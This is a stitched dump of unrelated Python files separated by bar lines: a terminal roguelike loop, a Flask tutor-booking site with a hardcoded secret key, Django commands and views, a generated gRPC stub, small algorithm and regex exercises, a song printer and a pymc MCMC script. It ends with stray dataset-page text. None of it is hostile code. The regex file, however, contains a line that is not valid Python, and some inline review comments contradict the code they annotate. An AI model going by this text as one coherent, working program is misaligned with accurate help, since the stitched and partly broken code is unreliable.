        """Play the flashing HULL BREACH banner, then advance the game a tick."""
        os.system("clear")
        print("OH NO")
        time.sleep(1)
        print("IT'S A...")
        time.sleep(2)
        print(" _ _ _ _ _ _ ____ ____ _____ _ ____ _ _ ")
        print("| | | | | | | | | | | __ )| _ \| ____| / \ / ___| | | |")
        print("| |_| | | | | | | | | _ \| |_) | _| / _ \| | | |_| |")
        print("| _ | |_| | |___| |___ | |_) | _ <| |___ / ___ \ |___| _ |")
        print("|_| |_|\___/|_____|_____| |____/|_| \_\_____/_/ \_\____|_| |_|")
        for i in range(5):
            time.sleep(.5)
            os.system("clear")
            print("OH NO")
            print("IT'S A...")
            time.sleep(.5)
            print(" _ _ _ _ _ _ ____ ____ _____ _ ____ _ _ ")
            print("| | | | | | | | | | | __ )| _ \| ____| / \ / ___| | | |")
            print("| |_| | | | | | | | | _ \| |_) | _| / _ \| | | |_| |")
            print("| _ | |_| | |___| |___ | |_) | _ <| |___ / ___ \ |___| _ |")
            print("|_| |_|\___/|_____|_____| |____/|_| \_\_____/_/ \_\____|_| |_|")
        self.tick()

    def tick(self):
        """Advance the world one step: reap dead entities, tick everyone, handle death/hunger, redraw."""
        # checks to make sure nothing is still sticking around after is has 0 or less health
        # this should probably not be here
        for row in self.entities:
            for col in row:
                for thingy in col:
                    try:
                        if thingy.health <= 0:
                            #self.remove_entity(thingy.xPos, thingy.yPos, thingy)
                            thingy.die(self)
                            kill_adj = ["brutally", "efficiently", "swiftly", "messily", "violently", "cheerfully"][random.randint(0,5)]
                            kill_msg = ["murder", "slaughter", "destroy", "annihilate", "obliterate", "kill", "massacre"][random.randint(0,6)]
                            self.say("You " + kill_adj + " " + kill_msg + " the " + thingy.name)
                    except AttributeError:
                        # this occurs when the entity doesn't have any health, like a book or other item
                        pass
        #thingy.tick(self)
        for entity in self.entity_array:
            entity.tick(self)
        if self.player.health <= 0:
            self.say("ur ded rip in piece")
            self.remove_entity(self.player.xPos, self.player.yPos, self.player)
            self.render()
            sys.exit()
        self.time += 1
        if self.time % 5 == 0:
            # hunger decays once every five ticks
            self.player.hunger -= 1
        self.render()
        if random.randint(1, 1000) == 1:
            # 0.1% chance per tick of a random hull breach event
            self.hull_breach()
def run(guy):
    """Main game loop: build a Game around `guy` and translate keypresses into actions."""
    game = Game(guy, 70, 20, 5, 5)
    guy.game = game
    inv = False  # NOTE(review): never read afterwards -- dead flag?
    # here's where the controls are defined
    # arrow keys - move
    # a - use/apply
    # t - throw item
    # d - drop item
    # , - pick up
    # q - quit
    # i - inventory
    # space - wait
    while 1:
        inn = getch.__call__()
        # j/k scroll the dialogue pane without consuming a game turn
        if inn == "j":
            game.info.scroll_back()
            game.render()
        elif inn == "k":
            game.info.scroll_forward()
            game.render()
        if inn in game.player.controls.keys():
            # if the function needs to not tick, make it return something
            if game.player.controls[inn](game) == None:
                game.tick()
        else:
            # print(inn)
            pass
|
# -*- coding: utf-8 -*-
from flask import Flask, render_template, request, redirect, url_for
from flask_sqlalchemy import SQLAlchemy
from sqlalchemy.sql import func
from forms import BookingForm, RequestForm, MsgForm
import json
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///tutors2.db'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
# NOTE(review): secret key is hardcoded in source -- acceptable for a study
# project, but move it to an environment variable before any deployment.
app.config['SECRET_KEY'] = 'wqeqrfdgvytrhgfbnfdgewtfgeryvsdferwow?!'
db = SQLAlchemy(app)
# Imported after `db` is created -- presumably models imports `db` from this
# module (circular-import workaround); confirm in models.py.
from models import Tutor, Tutor_Goal, Goal, Schedule, Booking, Request, Message
@app.context_processor
def pass_goals():
    """Inject `goals` and `week_days` into every template rendering context."""
    # Russian weekday names keyed by short English day codes.
    # Fixed: "sun" was mapped to "четверг" (Thursday, duplicating "thu");
    # it should be "воскресенье" (Sunday).
    week_days = {"mon": "понедельник", "tue": "вторник", "wed": "среда", "thu": "четверг", "fri": "пятница",
                 "sat": "суббота", "sun": "воскресенье"}
    # goal name -> [russian display name, icon]
    goals = {goal.name: [goal.ru_name, goal.icon] for goal in db.session.query(Goal).all()}
    return dict(goals=goals, week_days=week_days)
@app.route('/')
def index_page():
    """Home page: show six randomly chosen tutors."""
    random_tutors = db.session.query(Tutor).order_by(func.random()).limit(6)
    tutors_index = {
        tutor.id: {'name': tutor.name, 'about': tutor.about, 'picture': tutor.picture,
                   'rating': tutor.rating, 'price': tutor.price}
        for tutor in random_tutors
    }
    return render_template('index.html', tutors_index=tutors_index)
@app.route('/goals/<goal>/')
def goal_page(goal):
    """List tutors teaching `goal`, ordered by rating, highest first."""
    query_tutor_goal = db.session.query(Tutor, Tutor_Goal, Goal).join(Tutor).join(Goal).filter(
        Goal.name == goal).order_by(Tutor.rating.desc()).all()
    tutors_goal = {}
    for tutor_row in query_tutor_goal:
        # tutor_row is a (Tutor, Tutor_Goal, Goal) tuple; index 0 is the Tutor.
        tutors_goal[tutor_row[0].id] = {'name': tutor_row[0].name, 'about': tutor_row[0].about,
                                        'picture': tutor_row[0].picture,
                                        'rating': tutor_row[0].rating, 'price': tutor_row[0].price}
    return render_template('goal.html', tutors_goal=tutors_goal, goal=goal)
@app.route('/profiles/<int:tutor_id>/')
def tutor_profile_page(tutor_id):
    """Tutor profile: details, taught goals, and the weekly timetable (404 if unknown id)."""
    tutor_row = db.session.query(Tutor).get_or_404(tutor_id)
    goals_rows = db.session.query(Tutor, Tutor_Goal, Goal).join(Tutor).join(Goal).filter(Tutor.id == tutor_id).all()
    schedule_rows = db.session.query(Schedule).filter(Schedule.tutor_id == tutor_id).order_by(Schedule.time).all()
    # flatten ORM rows into plain lists for the template
    list_schedule_rows = [[row.id, row.weekday, row.time, row.enabled] for row in schedule_rows]
    # goals_row index 3 does not exist; index 2 is the Goal -- but the original
    # uses [3], presumably relying on query row attribute access; verify.
    tutor = {'id': tutor_row.id, 'name': tutor_row.name, 'about': tutor_row.about, 'picture': tutor_row.picture,
             'rating': tutor_row.rating,
             'price': tutor_row.price, 'goals': [goals_row[3].name for goals_row in goals_rows]}
    return render_template('profile.html', tutor=tutor, timetable=list_schedule_rows)
@app.route('/sent', methods=['GET'])
def search_result_page():
    """Static confirmation page shown after any form submission."""
    template_name = 'sent.html'
    return render_template(template_name)
@app.route('/booking/<tutor_id_name>/<day_time>/<int:schedule_id>', methods=['POST', 'GET'])
def tutor_booking_page(tutor_id_name, day_time, schedule_id):
    """Booking form for one tutor slot; on valid POST, persist the Booking and redirect.

    URL parts: `tutor_id_name` is "id--name" and `day_time` is "day--time";
    `schedule_id` identifies the booked Schedule row.
    """
    tutor_id, tutor_name = tutor_id_name.split('--')
    day, time = day_time.split('--')
    form_booking = BookingForm()
    if form_booking.validate_on_submit():
        # Only the client's name/phone and the schedule id are persisted; the
        # original also read tutor id/name and day/time form fields into
        # locals that were never used -- dropped here.
        booking_new = Booking(
            name=form_booking.booking_client_name.data,
            phone=form_booking.booking_client_tel.data,
            schedule_id=schedule_id,
        )
        db.session.add(booking_new)
        db.session.commit()
        return redirect(url_for('search_result_page'))
    booking_data = {'tutor_id': tutor_id, 'tutor_name': tutor_name, 'day': day, 'time': time}
    return render_template('booking.html', booking_data=booking_data, form_booking=form_booking)
@app.route('/message/<int:tutor_id>', methods=['POST', 'GET'])
def msg(tutor_id):
    """Message form for a tutor; on valid POST, store the Message and redirect."""
    form_msg = MsgForm()
    if form_msg.validate_on_submit():
        msg_new = Message(
            tutor_id=form_msg.msg_tutor_id.data,
            name=form_msg.msg_client_name.data,
            phone=form_msg.msg_client_tel.data,
            text=form_msg.msg_text.data,
        )
        db.session.add(msg_new)
        db.session.commit()
        return redirect(url_for('search_result_page'))
    # get_or_404 keeps this consistent with tutor_profile_page and returns a
    # 404 instead of an AttributeError crash when the tutor id is unknown
    # (the original used .first() and then dereferenced the possible None).
    tutor_row = db.session.query(Tutor).get_or_404(tutor_id)
    tutor = {'id': tutor_row.id, 'name': tutor_row.name, 'picture': tutor_row.picture}
    return render_template('message.html', form_msg=form_msg, tutor=tutor)
@app.route('/pick', methods=['POST', 'GET'])
def request_page():
    """Tutor-selection request form; on valid POST, persist the Request and redirect."""
    form_request = RequestForm()
    if form_request.validate_on_submit():
        # the form delivers the goal id as a string; the FK column needs an int
        request_goal = int(form_request.request_goal.data)
        request_client_name = form_request.request_client_name.data
        request_client_tel = form_request.request_client_tel.data
        request_new = Request(name=request_client_name, phone=request_client_tel, goal_id=request_goal)
        db.session.add(request_new)
        db.session.commit()
        return redirect(url_for('search_result_page'))
    return render_template('pick.html', form_request=form_request)
@app.errorhandler(404)
def page_not_found(e):
    """Render the custom 404 page together with the proper status code."""
    body = render_template('404.html')
    return body, 404
|
# NOTE(review): "Pehawar" is likely a typo for "Peshawar" -- verify before fixing the data.
cities = ["Karachi","Lahore","Islamabad","Quetta","Pehawar","Hyderabad","Sialkot","Gawadar","Mardan"]
# Delete the last element (index 8, "Mardan"); 8 items remain, valid indexes 0..7.
del cities[8]
# print(cities[8]) would raise IndexError: the highest valid index is now 7
cities.remove("Gawadar")
# print(cities[7]) would raise IndexError: 7 items remain, highest valid index is 6
from django.apps import apps
from django.core.management.base import BaseCommand, CommandError
from django.conf import settings
from django.db.models import Q
from django.template.defaultfilters import pluralize
from humanresources.utils import send_mail
class Command(BaseCommand):
    """Management command: inspect all finance Orders for data inconsistencies.

    Optionally restrict to Orders of the given responsible users
    (``--responsible``) and/or email each of those users a data-quality
    report (``--notify``).
    """

    help = "Inspect all Orders in the DB for inconsistencies."

    def add_arguments(self, parser):
        # one or more usernames to restrict the inspection to
        parser.add_argument("--responsible", type=str, nargs="+")
        # when combined with --responsible, email each selected user a report
        parser.add_argument("--notify", action="store_true")

    def handle(self, *args, **options):
        User = apps.get_model("auth", "User")
        Order = apps.get_model("finance", "Order")
        users_to_notify = []
        # empty Q() filters nothing when no --responsible is given
        optional_filters = Q()
        if options["responsible"]:
            for username in options["responsible"]:
                try:
                    user = User.objects.get(username=username)
                except User.DoesNotExist:
                    raise CommandError("User '%s' not found" % username)
                users_to_notify.append(user)
                optional_filters.add(Q(responsible=user), Q.OR)
        # apply initial filters
        orders = Order.objects.filter(optional_filters)
        self.stdout.write(f"Found {orders.count()} Orders")
        if options["responsible"]:
            self.stdout.write(
                f"Found {orders.count()} Orders belonging to user{pluralize(options['responsible'])} {', '.join([repr(u) for u in options['responsible']])}"
            )
        orders_missing_supplier = orders.filter(supplier__isnull=True)
        if orders_missing_supplier:
            self.stdout.write(
                self.style.WARNING(
                    f"{orders_missing_supplier.count()} Orders are missing a Supplier"
                )
            )
        # currently the only warning category; extend by OR-ing querysets here
        all_warnings = orders_missing_supplier
        if all_warnings and options["responsible"] and options["notify"]:
            # Send a notification email to each user with inconsistent data records
            subject = "Data quality report"
            for user in users_to_notify:
                if not all_warnings.filter(responsible=user):
                    continue
                orders_missing_supplier = all_warnings.filter(
                    responsible=user
                ).order_by('order_reqdate')
                recipient_list = [user.email]
                message_context = {
                    "base_url": settings.BASE_URL,
                    "orders_missing_supplier": orders_missing_supplier,
                }
                send_mail(subject, recipient_list, message_context)
                self.stdout.write(self.style.SUCCESS(f"Report sent to {user.email}"))
        elif all_warnings and options["responsible"] and not options["notify"]:
            self.stdout.write(
                "Pass the optional argument '--notify' to send an email to the users above"
            )
        elif all_warnings and not options["responsible"] and options["notify"]:
            users_to_warn = [
                User.objects.get(id=user_id)
                for user_id in all_warnings.values_list("responsible", flat=True)
                .distinct()
                .order_by("responsible__username")
            ]
            for user in users_to_warn:
                user_orders = all_warnings.filter(responsible=user)
                # was a bare print(); self.stdout.write for consistency with
                # the rest of the command (and to honor --no-color etc.)
                self.stdout.write(f" {user_orders.count():3d} belonging to user '{user}'")
            self.stdout.write(
                self.style.ERROR(
                    "Mass notification is disabled, please select the users you wish to notify"
                )
            )
            self.stdout.write(
                # fixed typo in the user-facing hint: '--reponsible' -> '--responsible'
                "Pass the argument '--responsible <user1> <user2>' to send an email to the selected users"
            )
        else:
            self.stdout.write("Nothing to report.")
|
# Copyright (c) 2017-2023 Digital Asset (Switzerland) GmbH and/or its affiliates. All rights reserved.
# SPDX-License-Identifier: Apache-2.0
# fmt: off
# isort: skip_file
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from . import ledger_configuration_service_pb2 as com_dot_daml_dot_ledger_dot_api_dot_v1_dot_ledger__configuration__service__pb2
class LedgerConfigurationServiceStub(object):
    """LedgerConfigurationService allows clients to subscribe to changes of the ledger configuration.
    """

    def __init__(self, channel):
        """Constructor.

        Args:
            channel: A grpc.Channel.
        """
        # Server-streaming RPC: one request in, a stream of configuration
        # updates out. (Generated code -- regenerate from the .proto rather
        # than hand-editing.)
        self.GetLedgerConfiguration = channel.unary_stream(
                '/com.daml.ledger.api.v1.LedgerConfigurationService/GetLedgerConfiguration',
                request_serializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_ledger__configuration__service__pb2.GetLedgerConfigurationRequest.SerializeToString,
                response_deserializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_ledger__configuration__service__pb2.GetLedgerConfigurationResponse.FromString,
                )
class LedgerConfigurationServiceServicer(object):
    """LedgerConfigurationService allows clients to subscribe to changes of the ledger configuration.
    """

    def GetLedgerConfiguration(self, request, context):
        """Returns the latest configuration as the first response, and publishes configuration updates in the same stream.
        """
        # Default generated behavior: subclasses override with a real implementation.
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')
def add_LedgerConfigurationServiceServicer_to_server(servicer, server):
    """Register the servicer's RPC handlers on `server` under the full service name.

    (Generated code -- regenerate from the .proto rather than hand-editing.)
    """
    rpc_method_handlers = {
            'GetLedgerConfiguration': grpc.unary_stream_rpc_method_handler(
                    servicer.GetLedgerConfiguration,
                    request_deserializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_ledger__configuration__service__pb2.GetLedgerConfigurationRequest.FromString,
                    response_serializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_ledger__configuration__service__pb2.GetLedgerConfigurationResponse.SerializeToString,
            ),
    }
    generic_handler = grpc.method_handlers_generic_handler(
            'com.daml.ledger.api.v1.LedgerConfigurationService', rpc_method_handlers)
    server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class LedgerConfigurationService(object):
    """LedgerConfigurationService allows clients to subscribe to changes of the ledger configuration.
    """

    @staticmethod
    def GetLedgerConfiguration(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        # One-shot convenience wrapper: opens a channel to `target` and invokes
        # the server-streaming RPC without requiring a Stub instance.
        return grpc.experimental.unary_stream(request, target, '/com.daml.ledger.api.v1.LedgerConfigurationService/GetLedgerConfiguration',
            com_dot_daml_dot_ledger_dot_api_dot_v1_dot_ledger__configuration__service__pb2.GetLedgerConfigurationRequest.SerializeToString,
            com_dot_daml_dot_ledger_dot_api_dot_v1_dot_ledger__configuration__service__pb2.GetLedgerConfigurationResponse.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
|
#!/usr/bin/python


def kadanes(A):
    """Return the maximum subarray sum of A (Kadane's algorithm).

    O(n) time, O(1) extra space (the original kept the full DP table in a
    list for no benefit).

    Raises:
        IndexError: if A is empty, same as the original.
    """
    best = cur = A[0]
    for x in A[1:]:
        # best sum of a subarray ending at x: extend, or start fresh at x
        cur = max(x, cur + x)
        best = max(best, cur)
    return best


# TEST CASES
print(kadanes([-2, 1, -3, 4, -1, 2, 1, -5, 4]))  # 6
print(kadanes([2, 3, -1, -20, 5, 10]))  # 15
|
from bs4 import BeautifulSoup
import requests

url = input("Enter the website name: ")
response = requests.get('http://' + url)
data = response.content
soup = BeautifulSoup(data, 'html5lib')
for link in soup.find_all('a'):
    href = link.get("href")
    # <a> tags without an href yield None; skip them explicitly instead of
    # letting a bare `except: continue` swallow the AttributeError (and every
    # other error) as the original did.
    if not href:
        continue
    if not href.startswith("http"):
        # NOTE(review): the page is fetched over http:// but relative links
        # are rebuilt as https:// -- preserved as-is; confirm which scheme is
        # intended. Relative paths without a leading slash also produce odd
        # URLs here.
        full_link = 'https://' + url + href
    else:
        full_link = href
    print(full_link)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Feb 10 21:02:21 2017
@author: xueyan
"""
import re
key = r"javapythonhtmlvhdl"  # the source text
p1 = r"python"  # the regular expression we wrote
pattern1 = re.compile(p1)  # compile it
matcher1 = re.search(pattern1,key)  # and search with it
print(matcher1.group(0))
p = re.compile('[a-z]+')
p.match("")
print(p.match(""))  # no match on the empty string -> None
m = p.match( 'tempo')
print(m)
# Match-object accessors (results discarded; demonstration only):
m.start()
m.end()
m.span()
m.group(0)
try:
    # the pattern '[a-z]+' has no capture groups, so group(1) raises
    # IndexError -- the original caught EOFError first, which a Match object
    # never raises, so 'Error 1' could never print.
    m.group(1)
except IndexError:
    print('Error 1')
except Exception:
    # fallback kept for any other unexpected failure (was a bare except)
    print('Error 2')
p = re.compile('ab*')
m2 = p.match('ab123')
m2.span()
str_list = ['ab123', 'abc345', "345abc"]
store = []
# Record, per string, whether the pattern matches at its start.
for obj in str_list:
    print(obj)
    #print(p.match(obj).span())
    s=p.match(obj)
    print(s)
    #print(s.span())
    print(type(s))
    if(s!= None): #this one works
        store.append(True)
    else:
        store.append(False)
print(store)
type(str_list)  # result discarded; demonstration only
''' another approach -- this code seems compact than above'''
p = re.compile('ab*')
store2 = []
str_list = ['ab123', "345abc" , 'abc345']
# Keep only the strings that match at position 0 (Match objects are truthy).
for i, obj in enumerate(str_list):
    temp_matched = p.match(obj)
    if temp_matched:
        store2.append(str_list[i])
print(store2)
''' ========= '''
a=2
if(a!=1):
    print("Unequal")
'''
'''
[ "t"n"r"f"v]
p = re.compile('\d+')
p.findall('12 drummers drumming, 11 pipers piping, 10 lords a-leaping')
print(re.match(r'From\s+', 'Fromage amk'))
print(re.match(r'Fromage\s+', 'Fromage amk'))
print(re.match(r'From\s+', 'From amk Thu May 14 19:12:10 1998'))
p2 = re.compile(r'\d+')
p2.findall('12 drummers drumming, 11 pipers piping, 10 lords a-leaping')
m = re.match('hello', 'hello world!')
print(m.group())
p = re.compile('\d+')
print(p.split('one1two2three3four4'))
p = re.compile(r'(\w+) (\w+)')
s = 'i say, hello world!'
print(p.subn(r'\2 \1', s))
'''
Mar05, 2016-- experiment with normal expression...
'''
col_names = ['log_var1', 'Log_var1', 'var1_log', 'var2_log_abc', 'var2_log_log_abc', 'var2_log3_log_abc', 'var2_2log3_log3_log_abc']
pattern0 = re.compile('log')
# re.match anchors at the start of the string; re.search scans the whole string.
print(re.match(pattern0, col_names[0])) #<_sre.SRE_Match object; span=(0, 3), match='log'>
print(re.match(pattern0, col_names[0]).group()) #log
print(re.match(pattern0, col_names[1])) #None
print(re.match(pattern0, col_names[2])) #None
print(re.match(pattern0, col_names[3])) #None
# re.I makes the pattern case-insensitive.
pattern0b = re.compile('log', re.I)
print(re.match(pattern0b, col_names[0])) # <_sre.SRE_Match object; span=(0, 3), match='log'>
print(re.match(pattern0b, col_names[0]).group()) #log
print(re.match(pattern0b, col_names[1])) # <_sre.SRE_Match object; span=(0, 3), match='Log'>
print(re.match(pattern0b, col_names[2])) # None
print(re.match(pattern0b, col_names[3])) # None
print(re.search(pattern0b, col_names[0])) # <_sre.SRE_Match object; span=(0, 3), match='log'>
print(re.search(pattern0b, col_names[0]).group()) # log
print(re.search(pattern0b, col_names[1])) # <_sre.SRE_Match object; span=(0, 3), match='Log'>
print(re.search(pattern0b, col_names[2])) # <_sre.SRE_Match object; span=(5, 8), match='log'>
print(re.search(pattern0b, col_names[3])) # <_sre.SRE_Match object; span=(5, 8), match='log'>
print(re.search(pattern0b, col_names[4])) # <_sre.SRE_Match object; span=(5, 8), match='log'>
print(re.findall(pattern0b, col_names[4]))
for m in re.finditer(pattern0b, col_names[4]):
    print(m.group())
# \d+ requires at least one digit; \d* also matches a bare 'log'.
pattern0c = re.compile('log\d+')
pattern0d = re.compile('log\d*')
pattern0e = re.compile('\d+log\d+')
pattern0f = re.compile('\d*log\d*')
print(re.search(pattern0c, col_names[5])) #<_sre.SRE_Match object; span=(5, 9), match='log3'>
print(re.findall(pattern0c, col_names[5])) # ['log3']
print(re.search(pattern0d, col_names[5])) #<_sre.SRE_Match object; span=(5, 9), match='log3'>
print(re.findall(pattern0d, col_names[5])) # ['log3', 'log']
print(re.search(pattern0e, col_names[6])) #<_sre.SRE_Match object; span=(5, 10), match='2log3'>
print(re.findall(pattern0e, col_names[6])) #['2log3']
print(re.search(pattern0f, col_names[6]))
print(re.findall(pattern0f, col_names[6]))
# \A anchors at the start of the string (like ^ without MULTILINE).
pattern1 = re.compile('\Alog')
print(re.search(pattern1, col_names[0])) #<_sre.SRE_Match object; span=(0, 3), match='log'>
print(re.search(pattern1, col_names[1])) #None
print(re.search(pattern1, col_names[2])) #None
print(re.search(pattern1, col_names[3])) #None
# NOTE: \Z matches only at the END of the string, so '\Zlog' (text after the
# end) can never match -- every search below prints None. 'log\Z' was likely
# intended.
pattern2 = re.compile('\Zlog')
print(re.search(pattern2, col_names[0]))
print(re.search(pattern2, col_names[1]))
print(re.search(pattern2, col_names[2]))
print(re.search(pattern2, col_names[3]))
'''
Mar-07, 2017
'''
#find string that ends with "log"
nojoke1 = re.findall("log$", col_names[0])
nojoke2 = re.findall("log$", col_names[2])
nojoke1c = re.search("log$", col_names[0])
nojoke2c = re.search("log$", col_names[2])
print(nojoke1)
print(nojoke2)
print(nojoke1c)
print(nojoke2c)
#find string that begins with "log"
nojoke3 = re.findall(r"^log", col_names[0])
nojoke4 = re.findall(r"^log", col_names[2])
nojoke3c = re.search(r"^log", col_names[0])
nojoke4c = re.search(r"^log", col_names[2])
print(nojoke3)
print(nojoke4)
print(nojoke3c)
print(nojoke4c)
|
from django.shortcuts import render
from django.shortcuts import render_to_response
from django.template import RequestContext
from .models import Project
# Create your views here.
def home(request):
    """Render the zh company home page."""
    # render() replaces render_to_response(..., context_instance=RequestContext),
    # a combination removed in Django 1.10; `render` is already imported above.
    return render(request, 'web/company_zh/home.html', {})
def contact(request):
    """Render the zh company contact page."""
    # render() replaces the removed render_to_response/context_instance combo.
    return render(request, 'web/company_zh/contact.html', {})
def portfolio(request):
    """Render the zh portfolio page with every Project."""
    projects = Project.objects.all()
    # render() replaces the removed render_to_response/context_instance combo.
    return render(request, 'web/company_zh/portfolio.html', {'projects': projects})
|
"""
Programa feito em base a um desafio proposto por https://github.com/13Ax0
Todos os créditos vão á ele 13Ax0.
"""
from time import sleep
lista = ['2 Turtle Doves', '3 French hens', '4 calling birds', '5 golden rings', '6 geese a-laying', \
'7 swans a-swimming', '8 maids a-milking', '9 ladies dancing', '10 lords a-leaping', '11 pipers piping',\
'12 drummers drumming']
# Ordinal suffixes
def repor(x: str) -> str:
    """Advance an English ordinal suffix: 'st' -> 'nd' -> 'rd' -> 'th' -> 'th'.

    Unknown input is returned unchanged; the original fell through to
    `else: pass` and returned None, which would crash the caller's f-string
    on the following day.
    """
    _next = {'st': 'nd', 'nd': 'rd', 'rd': 'th', 'th': 'th'}
    return _next.get(x, x)
musica = ['My true love sent to me'] #Verses accumulated so far
day, pos = 1, 'st' #Start at day 1 ("1st")
x = 0 #Slice index into `lista`: picks the next verse to add each day
while day != 13: #Until the day would become 13:
    #Sing this day's block of the song
    print(f"On the {day}{pos} day of Christmas") #Day header line
    for verso in musica: #Print every accumulated verse
        print(verso + ',') #one per line
    #Close the refrain with its final fixed line and a divider
    print('1 Partridge in a Pear Tree.\n', "~~"*25)
    day += 1; pos = repor(pos) #Advance the day and its ordinal suffix
    #First pass: 1st -> 2nd, then 2nd -> 3rd, and so on
    if day == 13:
        break #Stop after the 12th day has been sung
    sleep(5) #Wait 5 seconds before the next verse
    musica.insert(1, lista[x]) #Insert the new verse right after the first line
    x += 1 #Take the next verse from `lista` next time
|
#!/usr/bin/env python
"""Bayesian calibration of a Newns-Anderson chemisorption model via MCMC.

Loads substrate d-band DOS, adsorbate DOS, and binding energies, places
priors on the model parameters (adsorbate level, coupling scale, broadening,
orthogonalization strength, sp contribution), and samples the posterior
with pymc (v2) MCMC, persisting the trace to 'M.pickle'.
"""
from ase import io
import numpy as np
from scipy import integrate
import pymc as pm
from scipy.signal import hilbert
import pickle, time, math
from chemisorption import namodel
from ase.db import connect

# ---- load in data --------------------------------------------------------
db = connect('bayeschem.db')
List = [row.label for row in db.select()]        # system labels
Vak2 = [row.vad for row in db.select()]          # adsorbate-metal couplings V_ak^2
f = [row.filling for row in db.select()]         # d-band fillings
ergy = np.linspace(-15, 15, 3001)                # energy grid (eV)
fermiindex = np.argmax(ergy >= 0)                # index of the Fermi level on the grid
dos_d = [row.data["dos_sub"] for row in db.select()]
dos_ads = [row.data["dos_ads"] for row in db.select()]
de = [row.data['de'] for row in db.select()]
print(List)
print(Vak2)
print(f)
print(dos_d)
print(dos_ads)
print(de)
# NOTE(review): the three loads below overwrite/shadow the database-loaded
# dos_d (and ignore dos_ads/de from the DB) — confirm which data source is
# authoritative; behavior kept as-is.
dos_d = np.loadtxt('dos_d.txt')
y1_data = np.loadtxt('dos_ads.txt')              # observed adsorbate DOS
y2_data = np.load('E.npy')                       # observed binding energies

# ---- priors ---------------------------------------------------------------
Initeffadse = -5.0  # -5.0   effective adsorbate level (eV)
Initbeta = 2.1      # 2.0    multiplicative scale on V_ak^2
Initdelta = 1.0     # 1.0    sp-band broadening (eV)
InitAlpha = 0.036   # .5     orthogonalization coefficient
InitEsp = -3.25     # -2.0   sp contribution to the binding energy (eV)
effadse = pm.Normal('effadse', -5.0, 1, value=Initeffadse)
beta = pm.Lognormal('beta', 2, 1, value=Initbeta)
delta = pm.Lognormal('delta', 1, 0.25, value=Initdelta)
alpha = pm.Uniform('alpha', 0, 1.0, value=InitAlpha)
Esp = pm.Normal('Esp', -3.25, 1, value=InitEsp)
var_1 = pm.InverseGamma('var_1', 2.0, 0.05, value=0.05)  # DOS noise variance
var_2 = pm.InverseGamma('var_2', 2.0, 0.1, value=0.1)    # energy noise variance
a = len(ergy)  # weight applied to the energy log-likelihood term

@pm.stochastic(observed=True)
def custom_stochastic(effadse=effadse, beta=beta, delta=delta,
                      alpha=alpha, Esp=Esp,
                      var_1=var_1, var_2=var_2, value=y1_data):
    """Joint log-likelihood of the observed adsorbate DOS and binding energies."""
    logp1 = 0  # DOS likelihood accumulator
    logp2 = 0  # binding-energy likelihood accumulator
    for i in range(len(List)):
        # FIX: original referenced undefined name 'Vak2_d0'; the couplings
        # loaded from the database are stored in 'Vak2' above.
        Vak2_d = Vak2[i] * beta
        # Chemisorption (weighted-DOS) function and its sp-only counterpart.
        wdos = np.pi * Vak2_d * dos_d[i] + delta
        wdos_ = np.array([delta for k in range(0, len(ergy))])
        ergy_NA, dos_NA, na = namodel(effadse, wdos, wdos_,
                                      delta, ergy)
        # Normalize the model adsorbate DOS to unit integral over the grid.
        dos_NA = dos_NA / integrate.cumtrapz(dos_NA, ergy, axis=0)[-1]
        # Binding energy: sp term + (hybridization + orthogonalization) * 3.
        BE = Esp + (ergy_NA + 2 * (na + f[i]) * alpha * Vak2_d) * 3
        logp1 += -2 * math.log(var_1) * len(ergy) - np.sum((dos_NA - value[i])**2 / (2 * var_1))
        logp2 += -2 * math.log(var_2) - (BE - y2_data[i])**2 / (2 * var_2)
    return logp1 + a * logp2

# ---- sample ---------------------------------------------------------------
M = pm.MCMC([effadse, beta, delta, alpha, Esp,
             var_1, var_2, custom_stochastic],
            db='pickle', dbname='M.pickle')
M.sample(iter=200000, burn=0, thin=1)
M.db.close()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.